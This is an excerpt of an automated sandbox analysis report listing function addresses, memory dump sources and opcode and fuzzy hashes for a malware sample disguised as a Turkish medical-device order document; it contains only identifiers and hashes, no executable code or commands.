                                                                                                                          • Instruction Fuzzy Hash: 32E06571B106165B5758EBBA944047AB7DBAED8510314C16EC50DC7624EE30980186C4
                                                                                                                          Function 0622EF90 Relevance: .0, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: da8482a7116df56cc5f91501e01f16538681c7325bbeea458c631b7031fd4c06
                                                                                                                          • Instruction ID: fb8dc04f40a1d9f6b17bc401447ff227725abb024b7a5a5ee7ec484d7a4a7dae
                                                                                                                          • Opcode Fuzzy Hash: da8482a7116df56cc5f91501e01f16538681c7325bbeea458c631b7031fd4c06
                                                                                                                          • Instruction Fuzzy Hash: D3F0ED353604259FC754DB2DD854D59B7E9EFC9A2131640BAF509CB372DE61DC02CB90
                                                                                                                          Function 0622EFD1 Relevance: .0, Instructions: 28COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c4eec9720562436bb5a3e13a4f26ab7064a121b88ea179f877d20e2058fcbcee
                                                                                                                          • Instruction ID: dd1cbdfb47837461e92b55ee5447bc2d16e3fd64011c30eb2227a46bdb5b2d16
                                                                                                                          • Opcode Fuzzy Hash: c4eec9720562436bb5a3e13a4f26ab7064a121b88ea179f877d20e2058fcbcee
                                                                                                                          • Instruction Fuzzy Hash: 80E0D82195E3A35FE7624625A8917CE7BA0AB56210B1B858BE4D0CA4D5C405094447E1
                                                                                                                          Function 0765C0CA Relevance: .0, Instructions: 27COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4e37866cd0961694e7bf8e75fda2a6728259c7fa4f4d6fb0adb3fbdf814edef8
                                                                                                                          • Instruction ID: c73aef8c20db979fa04398fe4f5e4cdada9d07da50fd1260783267aa6040edd1
                                                                                                                          • Opcode Fuzzy Hash: 4e37866cd0961694e7bf8e75fda2a6728259c7fa4f4d6fb0adb3fbdf814edef8
                                                                                                                          • Instruction Fuzzy Hash: 1AE0D8B056C34ADFC33586149C215B33BA9AB47251F008197ED07DA545C5139A036777
                                                                                                                          Function 076520C8 Relevance: .0, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 20ea8b656383a71d69488f2f246ac4a86d70566e857ca7b001ef7cbf3515050e
                                                                                                                          • Instruction ID: e92c9ac2180bc45fc4445bd99b38730d70562d352875867808cb6daa07a39008
                                                                                                                          • Opcode Fuzzy Hash: 20ea8b656383a71d69488f2f246ac4a86d70566e857ca7b001ef7cbf3515050e
                                                                                                                          • Instruction Fuzzy Hash: F7E026B16253088FD3012BF28C1677A3BAEBF4A104B0740A5F205C72C2CE349902C326
                                                                                                                          Function 0622AAB7 Relevance: .0, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 391a47ff4a13ed16bae6416a0d5f949d57bcae0a5e4f9d6eaf6b4b93e9329a97
                                                                                                                          • Instruction ID: ee30c2f3cd05badc3e812fb5c43c1f7de9bff219298be9a2823f65b1971675d0
                                                                                                                          • Opcode Fuzzy Hash: 391a47ff4a13ed16bae6416a0d5f949d57bcae0a5e4f9d6eaf6b4b93e9329a97
                                                                                                                          • Instruction Fuzzy Hash: 49E022303193A35FC75A9A25662407E7BB15EC610130800BFE897C3582CF244C02C392
                                                                                                                          Function 0765B8E8 Relevance: .0, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d107dff0c99c7f91921dc2fd0072f2b16cb2d03e62529c5c959126e0f9c826dc
                                                                                                                          • Instruction ID: e74d9dfa036a48671f6d1139694a482df56aa007986d9fa4f3d2bf537e8aeb5d
                                                                                                                          • Opcode Fuzzy Hash: d107dff0c99c7f91921dc2fd0072f2b16cb2d03e62529c5c959126e0f9c826dc
                                                                                                                          • Instruction Fuzzy Hash: E5E04FE493D28CDF9610A7A5685157A7FB85B07120F0445D6DC8F87202D9260D03BBB3
                                                                                                                          Function 0622E268 Relevance: .0, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 248d2b8d5f879e4f6189a20e033f54f6566db1715c76eb6c08923d1befb491fa
                                                                                                                          • Instruction ID: 552b23f51926e23b2aded2593a98bd652773de2c8abcbffbf7fcec4e0fc5abe9
                                                                                                                          • Opcode Fuzzy Hash: 248d2b8d5f879e4f6189a20e033f54f6566db1715c76eb6c08923d1befb491fa
                                                                                                                          • Instruction Fuzzy Hash: 9EE0D8307157621FD35AD67958015BA7BE66DE9200314C29ED849CB555CA30580287D0
                                                                                                                          Function 07650DE8 Relevance: .0, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9d30e82a6832828ca13b1732747f240e8429e4c2317a1d661a23aedb8728212d
                                                                                                                          • Instruction ID: 43b9a52c969a7cbc99f9c350a60575183521301d4a7b8816a5924008d46d0969
                                                                                                                          • Opcode Fuzzy Hash: 9d30e82a6832828ca13b1732747f240e8429e4c2317a1d661a23aedb8728212d
                                                                                                                          • Instruction Fuzzy Hash: 89E09A7180834CAECB82EF708D140893FF0AF07310F01C4ABE89ADA152E630C2D8DB91
                                                                                                                          Function 0622AAC8 Relevance: .0, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b75ea2d17907d79b430be2ce2132b96177a57ceab7f6abee201b573612209878
                                                                                                                          • Instruction ID: 6fb02e3ab5577bf01a7b81acd1236780e49ecd7c9e89f0dd7608efdbd9b51948
                                                                                                                          • Opcode Fuzzy Hash: b75ea2d17907d79b430be2ce2132b96177a57ceab7f6abee201b573612209878
                                                                                                                          • Instruction Fuzzy Hash: B7D0C231721123A74BA9511BB61887F72A98FC46513040039F81BC3640DE50CC0183A2
                                                                                                                          Function 07658140 Relevance: .0, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a34f0fa446ba3ae92175009be7bb604fde348e8731f3ac95d120bf72bb16f956
                                                                                                                          • Instruction ID: 3945001338a6b1f4bb49a4fe60099d05d26734933405d6da40249bedbf0344ab
                                                                                                                          • Opcode Fuzzy Hash: a34f0fa446ba3ae92175009be7bb604fde348e8731f3ac95d120bf72bb16f956
                                                                                                                          • Instruction Fuzzy Hash: DBE092B4118747CFD3019B74C8586267BA0EF46204F05C48A88A78B6A6CA309C0BD755
                                                                                                                          Function 0622DE54 Relevance: .0, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6cc4ae320291c6a18578b712b5216e19742a96e750a8c00f99b573a9ce75f85f
                                                                                                                          • Instruction ID: 69b7ac49817453ff44dda9e81b1ef476da360840886fcd62bf25de20eae585a1
                                                                                                                          • Opcode Fuzzy Hash: 6cc4ae320291c6a18578b712b5216e19742a96e750a8c00f99b573a9ce75f85f
                                                                                                                          • Instruction Fuzzy Hash: 67D02B379B903156E6A0D515BCC17D92381FBC4300F298C45EC51D7048C86A95824151
                                                                                                                          Function 0765C0D8 Relevance: .0, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 681aac934cf425b4e2b26afff5e559859b2d892f24d24a180b20cd196f1006a3
                                                                                                                          • Instruction ID: 1a95078390d4fca0b808964522725e5e0d7295ac48324df46848d455228b7bc1
                                                                                                                          • Opcode Fuzzy Hash: 681aac934cf425b4e2b26afff5e559859b2d892f24d24a180b20cd196f1006a3
                                                                                                                          • Instruction Fuzzy Hash: 90D0C2B066C30FDFC3208654682126236AAAB4A200F008146DD07E6204CA6388032776
                                                                                                                          Function 07659D88 Relevance: .0, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 28445e3465e7392e3ff8a4f0552bc0e4ba66cdf683c8b143f87578385b371571
                                                                                                                          • Instruction ID: 49ae69fb1c8366df5d93dda34049e671b052dfa3139b0c614d4295f5699ac0aa
                                                                                                                          • Opcode Fuzzy Hash: 28445e3465e7392e3ff8a4f0552bc0e4ba66cdf683c8b143f87578385b371571
                                                                                                                          • Instruction Fuzzy Hash: 98D0A7F467CF04C7DA5C3274951C73AB1B79BC3301F105361AD0F86686D926B813B692
                                                                                                                          Function 0765B8F8 Relevance: .0, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4d603c543cf744f3bcfb83c9c756d6c8ad42b0b068545be329726d19afe12366
                                                                                                                          • Instruction ID: c8b36baeef7ee8c1e90e144bd7e1067678fecbaacc9c8dcd12ca9282c31af204
                                                                                                                          • Opcode Fuzzy Hash: 4d603c543cf744f3bcfb83c9c756d6c8ad42b0b068545be329726d19afe12366
                                                                                                                          • Instruction Fuzzy Hash: 51D05EE4E3C20CDB4620E695A84527A72ECA747121F144886DC0F83304E9211D0373F3
                                                                                                                          Function 062211B8 Relevance: .0, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 76360fe0affb1a14a4d0e5e922ce00b2c022c86aca0b51b2e6a5a14f233188d1
                                                                                                                          • Instruction ID: a99252e0a7eb69b965e1a5a5c93814a9be96eb7856c37f717fa10669ac6775b6
                                                                                                                          • Opcode Fuzzy Hash: 76360fe0affb1a14a4d0e5e922ce00b2c022c86aca0b51b2e6a5a14f233188d1
                                                                                                                          • Instruction Fuzzy Hash: 8EE08C70A4034AEFC744FFB4E508A9EB7F9EB40304F1086A9C90593202DB305E40DB92
                                                                                                                          Function 0765C092 Relevance: .0, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 463a662b75d7544938e2a93f10b166eef22acc476361157ba02be42ceac24425
                                                                                                                          • Instruction ID: f18d6244aa1b2e57061bec9780282d768dc4c218458d754d2e3298107549f9de
                                                                                                                          • Opcode Fuzzy Hash: 463a662b75d7544938e2a93f10b166eef22acc476361157ba02be42ceac24425
                                                                                                                          • Instruction Fuzzy Hash: D3D0A9C222C386CFCA0692B46E342FD2F369BDB105F18058BC81B8A142D527490337B3
                                                                                                                          Function 0765AE9E Relevance: .0, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: da299d776f02c88ac5140b090e57e05f3dcda6b7ce29c1ac5f30358a85697719
                                                                                                                          • Instruction ID: 45818fee2c821db2da860817b0cd483544a636ad00348a8262cd867d2d47f773
                                                                                                                          • Opcode Fuzzy Hash: da299d776f02c88ac5140b090e57e05f3dcda6b7ce29c1ac5f30358a85697719
                                                                                                                          • Instruction Fuzzy Hash: 80E04FB09047468FC715CF75885626AFBF27F42210F14805AD5298A255D7301806DB92
                                                                                                                          Function 0765C2E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 962c650367be2fcdc11167b5406c966829eeb14cd84de19e14fec2539b6a9e9b
                                                                                                                          • Instruction ID: 03d1003bcfcfe8baa7197b5401f48c91b34b3ab2080f17dcd42ea4f0908125e3
                                                                                                                          • Opcode Fuzzy Hash: 962c650367be2fcdc11167b5406c966829eeb14cd84de19e14fec2539b6a9e9b
                                                                                                                          • Instruction Fuzzy Hash: 43D05EA041D789DED71526A46C6B1627F68AA03540F05409ADD8F96803D600695BA3B3
                                                                                                                          Function 0765B059 Relevance: .0, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5ecfcf8710bcda95a260a84a36688ab95777341f1045f435f51452383249d672
                                                                                                                          • Instruction ID: bb3791059faf7d8bd246ac0362c13b9d5d6f675a62c561c3f3e373f1943f0ebb
                                                                                                                          • Opcode Fuzzy Hash: 5ecfcf8710bcda95a260a84a36688ab95777341f1045f435f51452383249d672
                                                                                                                          • Instruction Fuzzy Hash: 17D05B68B5420497D718D771584553E66A37784610F54D419BD4B87384DD345902D611
                                                                                                                          Function 0765EE30 Relevance: .0, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 932367d1ce1bcfd6199b6a00d43e1f1fa3dcf393a2409215a2ffa1287339ce19
                                                                                                                          • Instruction ID: ab9f140ff9292b927b61cc631e4901aeb177756e8e9dee944a19d188a47003a6
                                                                                                                          • Opcode Fuzzy Hash: 932367d1ce1bcfd6199b6a00d43e1f1fa3dcf393a2409215a2ffa1287339ce19
                                                                                                                          • Instruction Fuzzy Hash: 8DE017B4D5530CEFCB40EFB8E54D69DBBF5AB14201F1001AAC908A3360EB715A80DB81
                                                                                                                          Function 07650DF8 Relevance: .0, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9dfe7ce59748817a09e3c40fb534d3a723c34be64bfbc5d724c37e4efeed2fa4
                                                                                                                          • Instruction ID: dec3ef3dc1d6da50412c404acbe0ed9ecb008c32f3ea3e4b48f825681b458e97
                                                                                                                          • Opcode Fuzzy Hash: 9dfe7ce59748817a09e3c40fb534d3a723c34be64bfbc5d724c37e4efeed2fa4
                                                                                                                          • Instruction Fuzzy Hash: 65E0127181460CDDCB80EF75D90459E7BE8AB05310F10C53AE85D9A110FA30D2D4DF80
                                                                                                                          Function 07656681 Relevance: .0, Instructions: 16COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f2c6fb3a44179d9de42b6cfb0a0c4fe02f846f0bdf99eb36f9e20392f3f857b6
                                                                                                                          • Instruction ID: e1cae53e7914d1ed742e018a81d78481ece278d47c94c0a7b551c8b88b5a3e9b
                                                                                                                          • Opcode Fuzzy Hash: f2c6fb3a44179d9de42b6cfb0a0c4fe02f846f0bdf99eb36f9e20392f3f857b6
                                                                                                                          • Instruction Fuzzy Hash: 40D0C97501D389ABC3121770F80A4A77F389903528B450587F9868D453CA5619D1C6A3
                                                                                                                          Function 076520D8 Relevance: .0, Instructions: 16COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 51182766e22eea90bd6947c3ee48ca39933c7ae9163154c79e4c10083d321c36
                                                                                                                          • Instruction ID: c97afb9365bc9bd9feffb418ec6a3fd53aabe11e6e83763f3fc62f916c568f2b
                                                                                                                          • Opcode Fuzzy Hash: 51182766e22eea90bd6947c3ee48ca39933c7ae9163154c79e4c10083d321c36
                                                                                                                          • Instruction Fuzzy Hash: FBD0A7B07202098B93043FB2981637637DFBB805057419014E60AC3280DF34D802D312
                                                                                                                          Function 0765C0A0 Relevance: .0, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 571c1bf981a942012686dedd280a8dce2e58367bab2bf8b9035e78e3ca24e77f
                                                                                                                          • Instruction ID: c0143dcf4161b97f9d9d0b6a27f6486eb81be403f3d3db8c48cb26dee751adcc
                                                                                                                          • Opcode Fuzzy Hash: 571c1bf981a942012686dedd280a8dce2e58367bab2bf8b9035e78e3ca24e77f
                                                                                                                          • Instruction Fuzzy Hash: 9FC08CD023C30FCBD908A2A86C2463D327E6BCF204F104007CE0B46100CA13480337B3
                                                                                                                          Function 0622921B Relevance: .0, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d397cad69f48c8fa95a316d4fc3002a2393fdae308db279397d97fd225ed4c58
                                                                                                                          • Instruction ID: 398d2a44b489e9bc8eed5f74c9a4d480987424f1c97e5942fa7296dbf6b6eb8f
                                                                                                                          • Opcode Fuzzy Hash: d397cad69f48c8fa95a316d4fc3002a2393fdae308db279397d97fd225ed4c58
                                                                                                                          • Instruction Fuzzy Hash: 2AD017350063849FCB42CB20C402CA5BFB5EF46320B1581DBE8448B233C3318915CB50
                                                                                                                          Function 062291EE Relevance: .0, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fc07cbaa6ba262dcc1227fa0636e3e142e4bf0472235242601ec77ac304c9441
                                                                                                                          • Instruction ID: d7479bd791286f720dc03d64212fbf933d21381acf10baec285b79cdd145b2bb
                                                                                                                          • Opcode Fuzzy Hash: fc07cbaa6ba262dcc1227fa0636e3e142e4bf0472235242601ec77ac304c9441
                                                                                                                          • Instruction Fuzzy Hash: AFD0A93882A3E52EC7833734AD0400A7F74BE1310030A42C7E484AA0A3EA280928C3B2
                                                                                                                          Function 0765E428 Relevance: .0, Instructions: 10COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dd6fd51580c386e1b269433f9e92738eee932d64b1f485a31534eec3e267ed36
                                                                                                                          • Instruction ID: 3afced5f461f1cbac89010bc5f86330f43bee4cbd305d8a0b398c12b3f781484
